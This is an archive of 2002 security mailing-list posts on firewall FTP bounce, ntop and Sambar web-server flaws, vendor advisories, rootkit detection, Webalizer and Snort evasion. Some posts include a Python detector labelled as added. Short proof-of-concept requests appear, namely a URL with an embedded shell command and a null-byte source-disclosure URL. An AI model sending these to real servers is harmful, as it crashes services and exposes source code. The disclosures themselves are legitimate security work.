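    for name, frags in (("ip overlap", overlapping_fragments()),
                        ("ip clean", clean_fragments())):
        print(f"{name:10s}:", find_overlaps(frags), find_small_fragments(frags))
```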




RE: Raptor Firewall FTP Bounce vulnerability

2002-04-17 Thread Lysel Christian Emre

> Firewall: Raptor 6.5.3i on Sun Solaris 7

Raptor (SEF) 7.0 on Windows NT 4.0 can also be exploited.

Note: Has Symantec Support been notified?



RE: Raptor Firewall FTP Bounce vulnerability

2002-04-17 Thread Roy Hills

Thanks for the info.

Yes, Symantec support were notified on 5 April 2002.

Roy Hills

At 13:35 17/04/02 +0200, Lysel Christian Emre wrote:
> > Firewall: Raptor 6.5.3i on Sun Solaris 7
>
> Raptor (SEF) 7.0 on Windows NT4.0, can also be exploited.
>
> Note: Has Symantec Support been notified?

--
Roy HillsTel:   +44 1634 721855
NTA Monitor Ltd  FAX:   +44 1634 721844
14 Ashford House, Beaufort Court,
Medway City Estate,  Email: [EMAIL PROTECTED]
Rochester, Kent ME2 4FA, UK  WWW:   http://www.nta-monitor.com/




segfault in ntop

2002-04-17 Thread JP

I'm sorry if this has already been discussed on here before, but I went
through the thread and saw nothing on it.

I was able to remotely segfault ntop v.2.0.0 using Netscape 6.1 by simply
specifying a command in the url location bar.  For example:

http://ntop.site.com:port/`ls`

The above command will cause ntop to segfault and core dump.  I tried a
few different commands, ls and su segfaulted ntop, whereas everything else
I tried gave a 403 error, but ntop stayed online.

Here's information about my ntop platform:

Mandrake Linux v8.1 kernel 2.4.8-26mdk
ntop v.2.0.0 MT [i686-pc-linux-gnu] (01/24/02 03:04:18 PM build)

I was able to segfault ntop from the following platforms:

Mandrake Linux v8.1 kernel 2.4.8-26mdk with Netscape v6.1
(Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1)

Mandrake Linux v8.1 kernel 2.4.8-26mdk with Opera 5.0 for Linux - 20010510 Build 024 
-[5]

Windows 2000 Server 5.00.2195 SP2 with Netscape v6.2.2
(Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.4.1)
Gecko/20020314 Netscape6/6.2.2)

I was unable to duplicate this segfault with the following browsers:

Internet Explorer v6.0.2600.
Konqueror v2.2.1

I did not test any other platforms or browsers than the ones listed here.
I have notified ntop and haven't received a response yet.

Thanks,

jason




KPMG-2002012: Sambar Webserver Serverside Fileparse Bypass

2002-04-17 Thread Peter Gründl



  -=Sambar Webserver Serverside Fileparse Bypass=-
  courtesy of KPMG Denmark

BUG-ID: 2002012
Released: 17th Apr 2002

Problem:

A flaw in the serverside URL parsing could allow a malicious user to
bypass serverside fileparsing and display the sourcecode of scripts.
The same flaw could allow a malicious user to crash the web service.


Vulnerable:
===
- Sambar Webserver V5.1p on Windows 2000
- Other versions were not tested.


Details:

It is possible to bypass the serverside parsing of scripts, such as
.pl, .jsp, .asp, .stm and download the sourcecode. The bypassing also
opens up for a request to certain DOS-devices that the server would
then attempt to access. These resources used in such requests are
not freed properly and as a result, the web server will eventually
run out of memory and the operating system will kill the web
service.

To bypass the serverside parsing, an attacker would have to access
the resource with a suffix of <space><null>. There are a lot of
ways to achieve this in e.g. Internet Explorer, and an example of
sourcecode exposure could be:

http://server/cgi-bin/environ.pl+%00

which would return the following (perl sourcecode):

read(STDIN, $CONTENT, $ENV{'CONTENT_LENGTH'});
print <<END;
GATEWAY_INTERFACE: $ENV{'GATEWAY_INTERFACE'}
PATH_INFO:  $ENV{'PATH_INFO'}
PATH_TRANSLATED:  $ENV{'PATH_TRANSLATED'}
QUERY_STRING:  $ENV{'QUERY_STRING'}
REMOTE_ADDR:  $ENV{'REMOTE_ADDR'}
REMOTE_HOST:  $ENV{'REMOTE_HOST'}
REMOTE_USER:  $ENV{'REMOTE_USER'}
REQUEST_METHOD:  $ENV{'REQUEST_METHOD'}
DOCUMENT_NAME:  $ENV{'DOCUMENT_NAME'}
DOCUMENT_URI:  $ENV{'DOCUMENT_URI'}
SCRIPT_NAME:  $ENV{'SCRIPT_NAME'}
SCRIPT_FILENAME:  $ENV{'SCRIPT_FILENAME'}
SERVER_NAME:  $ENV{'SERVER_NAME'}
SERVER_PORT:  $ENV{'SERVER_PORT'}
SERVER_PROTOCOL:  $ENV{'SERVER_PROTOCOL'}
SERVER_SOFTWARE:  $ENV{'SERVER_SOFTWARE'}
CONTENT_LENGTH:  $ENV{'CONTENT_LENGTH'}
CONTENT:  $CONTENT
END


Vendor URL:
===
You can visit the vendor's webpage here: http://www.sambar.com


Vendor response:

The vendor was contacted 3rd of April, 2002. The vendor confirmed the
bug on the same day, and notified us that a patch was being developed.
On the 17th of April, the vendor released a new version that corrects
the issues.


Corrective action:
==
The vendor has released Version 5.2b, which is available here:
http://sambar.dnsaloas.org/win32-preview.tar.gz


Author: Peter Gründl ([EMAIL PROTECTED])


KPMG is not responsible for the misuse of the information we provide
through our security advisories. These advisories are a service to
the professional security community. In no event shall KPMG be liable
for any consequences whatsoever arising out of or in connection
with the use or spread of this information.





IBM Security Advisory: IBM Tivoli Policy Director WebSEAL

2002-04-17 Thread Michael S Soukup

-BEGIN PGP SIGNED MESSAGE-

IBM SECURITY ADVISORY

Wed Apr 17 13:05:19 CDT 2002
======================================================================
   VULNERABILITY SUMMARY

VULNERABILITY:    Induced failure of IBM Tivoli Policy
                  Director WebSEAL component

PLATFORMS:        All platforms running IBM Tivoli Policy Director
                  WebSEAL, version 3.8, initial release, and using
                  SSL smart junctions

SOLUTION:         Apply the FixPaks listed in this Advisory

THREAT:           Malicious user can cause WebSEAL server failure

CERT Advisory:    NONE

======================================================================
   DETAILED INFORMATION

I.  Description

Background

A correspondent to SecurityFocus' BUGTRAQ in December 2001 (see
http://online.securityfocus.com/archive/1/245283) reported a possible
denial-of-service vulnerability in IBM Tivoli Policy Director
WebSEAL, v3.8.

Discussion

We have reviewed the purported problem and have concluded that there is
no denial of service vulnerability. IBM Tivoli Policy Director v3.8,
however, contains a defect related to the use of SSL junctions between
the WebSEAL component and Web Servers. This defect can cause the WebSEAL
component to fail if SSL junctions are being used and certain URLs
are then passed across these junctions.

This exposure was corrected as part of a regular fixpack cycle, in
Policy Director WebSEAL 3.8 Fixpack 1.


II. Impact

Customers using the original (Gold Master) release of IBM Tivoli Policy
Director WebSEAL Version 3.8, who also incorporate SSL junctions in their
deployment, may be subject to WebSEAL server failures.

III.  Solutions


  Workaround

There is no workaround.


  Official fix

The solution to this security-related exposure is to apply Fixpack
1 for the IBM Tivoli Policy Director WebSEAL, v3.8.

IBM recommends that customers always stay current with fixpacks
for all software products.  All registered customers have access to the
Tivoli Patches download site, and can access the IBM Tivoli Policy
Director WebSEAL 3.8 Fixpack 1 at:

https://www.tivoli.com/secure/support/patches/Tivoli_SecureWay_Policy_Director_WebSEAL_.html#3.8-PWS-0001



IV.  Contact Information

Comments regarding the content of this announcement can be directed to:

   [EMAIL PROTECTED]

To request the PGP public key that can be used to encrypt new
AIX security vulnerabilities, send email to:

[EMAIL PROTECTED]

with a subject of "get key".


If you would like to subscribe to the AIX security newsletter,
send a note to [EMAIL PROTECTED] with a subject of
"subscribe Security".

To cancel your subscription, use a subject of "unsubscribe Security".
To see a list of other available subscriptions, use a subject of "help".

IBM and AIX are registered trademarks of International Business Machines
Corporation.  All other trademarks are property of their
respective holders.


-BEGIN PGP SIGNATURE-
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBPL3CCwsPbaL1YgqvAQHZlwP/XQn1Q/GAfBaBHL2acrHLXFzWQ2tXoRvO
ugkbBJkEBBrkeAiHbM7i0u8uXA7gqn+6S0QmFU6y8sQ9VfldlTh7/C/0fxFNlJ9Y
Pb+njBRfala9417OUPXhBK4aUeRZxqWaFeGTPz+Jkx8CutTmHOE1vP6sioBM8ncr
ulXP+XiOJ5o=
=Iknk
-END PGP SIGNATURE-




Re: Raptor Firewall FTP Bounce vulnerability

2002-04-17 Thread William Aguilar


In-Reply-To: [EMAIL PROTECTED]

Symantec Enterprise Firewall FTP Bounce 
Vulnerability

Date Discovered
April 16, 2002

Risk 
Medium (dependent on customer configuration)

Affected Versions: 
Raptor Firewall V6.5.3 (Solaris)
Symantec Enterprise Firewall V7.0 (Solaris)

Overview
Symantec is aware of an FTP Bounce Vulnerability 
condition reported in Bugtraq ID# 267784 
(http://online.securityfocus.com/archive/1/267784).  
This potential vulnerability could affect some 
Symantec Enterprise Firewall deployments. Using 
this FTP-protocol based vulnerability, an attacker 
could potentially hide an attack by using the firewall 
identity against an unsuspecting and unprotected 
external machine.  In addition, by overwriting the 
PORT command with its own internal address, the 
firewall overwrites the FTP-server built-in protection 
mechanism that protects against this type of attack.

Recommendation
If the FTP Bounce Attack affects your deployment, 
please make sure you apply the related hotfix 
available from the Symantec Enterprise Support site.  
This hotfix is an enhanced version of our FTPd 
module for the affected platforms that extends the 
protection currently provided by the firewall.  We are 
currently investigating if this problem impacts our 
remaining supported products and platforms and we 
will release enhanced versions of the FTPd module 
as necessary.

This module update is available for download from 
the Symantec Enterprise Support site 
(http://www.symantec.com/techsupp).  The following 
enhancements have been made to the FTPd module 
for Solaris:

1)  By default, if the firewall detects a PORT 
request destined for an IP address other than the IP 
address of the FTP client, it will log the following 
warning:

"353 Warning: PORT command referenced a 
destination (x.x.x.x) that doesn't match control 
channel (y.y.y.y): possible Bounce attack? To enforce 
strict PORT checking please 
set "ftpd.allow_address_mismatch=False" in the 
Config.cf file."

If the firewall administrator decides that this is not a 
problem in their environment, they can disable this 
Warning message by setting the following Config.cf 
variable:

ftpd.suppress_address_mismatch_warning=True 
(default is False)

2)  If the firewall administrator wishes to 
enforce strict PORT command checking and block 
any PORT requests that reference a different 
address than the original FTP client IP they can set 
the following Config.cf variable:

ftpd.allow_address_mismatch=False (default is True)

By enforcing "strict" PORT checking on the firewall, 
security administrators do not have to make sure that 
all of their FTP servers are patched or configured to 
block the FTP Bounce Attack.

These security enhancements were verified by 
Symantec and ICSA Labs (www.icsalabs.com). The 
new features will extend the enterprise-level 
protection provided by our FTP proxy which among 
other checks already includes protection against FTP 
Bounce attacks off the firewall itself, blocking PORT 
commands that select a well-known port, FTP 
strong/weak user authentication methods, GET/PUT 
granular security policies, FTP protocol and 
command verification, and transparent address 
hiding.

Technical Description
The FTP Bounce attack exploits a known design flaw 
in the FTP standard.  All RFC compliant FTP servers 
must support the PORT command.  The PORT 
command is used between an FTP client and server 
to coordinate the data channel connection between 
the two devices.  The RFC dictates that a connection 
for the data channel should be allowed to any IP 
address and any port.  However, this RFC compliance 
renders FTP Servers vulnerable to 
misuse of the PORT command.  For a more detailed 
explanation of this issue please see CERT® Advisory 
CA-1997-27 FTP Bounce and the related technical tip.

The Symantec Enterprise Firewall automatically 
rewrites the PORT command with either the address 
of the client machine or the firewall address.  In either 
case when the PORT request reaches the FTP 
server, the PORT command will match the source 
address of the FTP client.  If configured, the FTP 
server scans the packet to make sure the PORT 
command matches the IP address of the client, and 
in all cases it does.  The FTP server then attempts to 
open a data connection to the client IP address, 
which then gets translated by the firewall to the 
victim's IP address.  This is not a desired behavior 
since it gives the security administrator a false sense 
of protection from an FTP bounce attack.



Copyright (c) 2002 by Symantec Corp.
Permission to redistribute this Alert electronically is 
granted as long as it is not edited in any way unless 
authorized by Symantec Security Response. 
Reprinting the whole or part of this Alert in medium 
other than electronically requires 

Re: An alternative method to check LKM backdoor/rootkit

2002-04-17 Thread Florian Weimer

Paul Starzetz [EMAIL PROTECTED] writes:

> Be sure that this will be fixed in the next 'generation' of LRKM's.
> Patching the device methods for disk special nodes is not a big deal -
> why not to incorporate even your code into one of the nice LRKM's? You
> probably found a weakness of 'current' LRKM's but in general it is a bad
> idea to check your machine while running a compromised kernel.

I agree.  You can never be sure which kernel you are running.  An
attacker could have placed a modified kernel on a swap device (which
excludes this very area from being used as swap space), and tweaked
the boot loader to load the modified kernel.

Using this approach, the modified kernel image can be made completely
invisible easily, and it still survives reboot.  Such a modification
is very hard to spot even during an offline analysis, and the
checklists I've seen so far do not address this problem at all.

-- 
Florian Weimer[EMAIL PROTECTED]
University of Stuttgart   http://CERT.Uni-Stuttgart.DE/people/fw/
RUS-CERT  +49-711-685-5973/fax +49-711-685-5898



RE: An alternative method to check LKM backdoor/rootkit

2002-04-17 Thread Philippe Bourgeois

Wang Jian wrote :

> Our alternative method uses the first style: to find the differences
> between the fake view and the real view.

[...]

> We read the raw disk and traverse the filesystem on disk, bypass the
> live filesystem, and create a real view of files on disk; then traverse
> the live filesystem to get the fake view. Compare the two view, we can
> find the differences. We will find the stealth files.


For your information, I wrote the same kind of tool some time ago.

It works fine for my needs, and found all the LKM I tested, as far as
files are hidden (I mean, if the LKM doesn't hide any file, ancheck
doesn't find it). I definitely think that the "find the differences
between the two views" approach is a very good approach to detect LKM.

I called my tool ancheck (alternate ncheck) because it works
more or less like the UNIX ncheck command (ncheck exists on most
UNIX systems, but not on Linux) :
http://www.cert-ist.com/francais/outils/ancheck03.tar.Z
http://www.cert-ist.com/francais/outils/ancheck03.tar.Z.sig

Ancheck is a set of 2 UNIX commands (ls_hidden and ancheck) designed
to locate hidden or deleted files. It works on UFS (Solaris) and EXT2
(Linux) file systems. You need TCT (the Coroner's Toolkit) to compile
the package. TCT can be downloaded from :
  http://www.porcupine.org/tct
  http://www.fish.com/tct/

Philippe Bourgeois
Cert-IST
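The "two views" comparison that Wang Jian's post and ancheck both rely on reduces to a diff between a directory listing read from the raw device and the same listing obtained through the running kernel. The following is an added example, not ancheck's or Wang Jian's code, that generalises the comparison to three kinds of discrepancy (entries hidden from the live view, entries present only in the live view, and same-named entries whose inode numbers differ). The views used here are constructed sample data; live_view_of() shows how the live side would be collected, and the disk side would come from a raw filesystem walker such as the TCT-based one Philippe describes.

```python
"""Cross-view comparison for hidden-file detection.
Added example; not ancheck's or Wang Jian's code. The DISK_VIEW and
LIVE_VIEW below are constructed sample data, not real systems."""
import os
from typing import Dict, Set, Tuple

# A view maps a directory path to {entry name: inode number}.
View = Dict[str, Dict[str, int]]


def live_view_of(root: str) -> View:
    """Gather the running kernel's (possibly lying) view via normal syscalls."""
    view: View = {}
    for dirpath, _dirs, _files in os.walk(root):
        with os.scandir(dirpath) as it:
            view[dirpath] = {e.name: e.inode() for e in it}
    return view


def diff_views(disk_view: View, live_view: View):
    """Compare the on-disk view with the live view.

    Returns three sets:
      hidden   - (dir, name, inode) present on disk but missing from the
                 live view: the signature of a file-hiding LKM
      phantom  - (dir, name, inode) in the live view but absent on disk
      mismatch - (dir, name, disk_inode, live_inode): same name resolves
                 to a different inode through the kernel than on disk
    """
    hidden: Set[Tuple[str, str, int]] = set()
    phantom: Set[Tuple[str, str, int]] = set()
    mismatch: Set[Tuple[str, str, int, int]] = set()
    for d in set(disk_view) | set(live_view):
        on_disk = disk_view.get(d, {})
        live = live_view.get(d, {})
        for name, ino in on_disk.items():
            if name not in live:
                hidden.add((d, name, ino))
            elif live[name] != ino:
                mismatch.add((d, name, ino, live[name]))
        for name, ino in live.items():
            if name not in on_disk:
                phantom.add((d, name, ino))
    return hidden, phantom, mismatch


# Constructed sample views for demonstration only.
DISK_VIEW: View = {
    "/sbin": {"init": 1001, "ls": 1002, ".rk": 2221},
    "/tmp": {"x": 40},
}
LIVE_VIEW: View = {
    "/sbin": {"init": 1001, "ls": 3003},
    "/tmp": {"x": 40, "ghost": 41},
}
```

On a quiescent system the three sets should all be empty; files created or deleted between the two walks show up as transient noise, so the walks are best run back to back in single-user mode. The caveat from Paul Starzetz and Florian Weimer earlier in the thread still applies: both views are obtained through the running kernel, so a rootkit that patches the block-device methods can lie to the raw-disk side as well, and an image read on a known-good machine is the stronger baseline.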




RE: Raptor Firewall FTP Bounce vulnerability

2002-04-17 Thread Martin O'Neal


Hiya,

As an observation, it's worth noting that by default the Raptor / SEF code
disables FTP PORT connections to low ports (<1024), so although it might be
possible to probe a remote machine, the utility of the exercise is limited.

Regards,
Martin O'Neal
Senior Security Consultant



-Original Message-
From: Roy Hills [mailto:[EMAIL PROTECTED]]
Sent: 15 April 2002 15:12
To: [EMAIL PROTECTED]
Subject: Raptor Firewall FTP Bounce vulnerability



Re: Remote buffer overflow in Webalizer

2002-04-17 Thread Bradford L. Barrett


> Here is a patch to fix the vulnerability (tested against webalizer-2.01-06).

Bad fix.. while it will prevent the buffer from overflowing (which I still
fail to see how can be used to execute a 'root' exploit, even with a LOT
of imagination), but will cause the buffer to be filled with a non-null
terminated string which will do all sorts of nasty things to your output,
not to mention wreak havoc on the stats since you are cutting off the
domain portion, not the hostname part, and adding random garbage at the
end.

Anyway, Version 2.01-10 has been released, which fixes this and a few
other buglets that have been discovered in the last month or so.  Get it
at the usual place (web: www.mrunix.net/webalizer/ or www.webalizer.org
or ftp: ftp.mrunix.net/pub/webalizer/), and should be on the mirror sites
soon.

--
Bradford L. Barrett  [EMAIL PROTECTED]
A free electron in a sea of neutrons DoD#1750 KD4NAW

The only thing Micro$oft has done for society, is make people
believe that computers are inherently unreliable.




RE: Snort exploits

2002-04-17 Thread Grimes, Roger

Not to get even further off topic...but I will...to support Dragos.

The whole IDS evasion thing mimics the scanners vs. virus writers war.  I've
been doing antivirus work since 1989 and I have heard that virus writers
were going to polymorph, encrypt, oli-this, poly-that since before there
were 100 viruses.  Nobody, not even the AV vendors thought that scanners
would still be fighting the good fight (and winning 99.999% of the time)
when 30,000+ viruses and worms appeared.  Virus scanners would run out of
memory, wouldn't be able to keep up with the signatures, would end up with
too many false-positives, would run so slow nobody would use them, etc.  But
the truth is fingerprint scanning (no matter how flawed) still works and I
hear less about AV scanner deaths every year...and when I do hear it's from
the vendors themselves...and guess what they have the new solution sitting
in the wings ready to go.  I see the same pattern in IDS...heck, yeah, the
black hatters will develop more sophisticated hacks...and the white hatters
will fight back...SUCCESSFULLY.

With that said, there are some viruses today that scare the mess out of the
good AV guys...ones that scare them and keep them up at night.  And DDoS
Reflection attacks???...if you're not scared you don't understand the
problem.  But the good guys will respond and life will go on as usual.

Just my one cent.

Roger A. Grimes

***
*Roger A. Grimes, VP of IT for GK/PHR Holding Company
*Gold Key Resorts and Professional Hospitality Resources
*email:  [EMAIL PROTECTED]
*ph: 757-491-2101 x403
*fax:757-491-6550
*932 Laskin Road, Virginia Beach, VA 23451
*Author of Malicious Mobile Code:  Virus Protection for Windows by O'Reilly
*http://www.oreilly.com/catalog/malmobcode/
***


;-Original Message-
;From: Dragos Ruiu [mailto:[EMAIL PROTECTED]]
;Sent: Wednesday, April 17, 2002 12:08 AM
;To: [EMAIL PROTECTED]
;Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED];
;[EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
;Subject: Re: Snort exploits


;Heh, well... first... don't panic. :-)

;I was actually expecting him to release fragroute on the CanSecWest conference CD,
;for his talk on it there and am preparing some appropriate counter measures for the
;variant of snort I was going to put on there.  Been kinda swamped with conference
;preparations so please do not ask me for any of this in advance of the conference.
;Odds are now that this info has gone out snort cvs will have fixes for this
;in a matter of hours or days...

;The TCP evasions are fairly easily detectable as overlaps should not normally occur.
;I'm sure Marty or Andrew will be releasing some tweaks to stream4 shortly to
;address this. It is just a matter of slightly more rigorous alerting and

;To everyone else:
;The game of evasion and countermeasures is the snake eating its tail and you
;shouldn't be naive and assume that there aren't other evasions out there because
;there are _always_ other obfuscations and countermeasures, and then detectors for
;--dr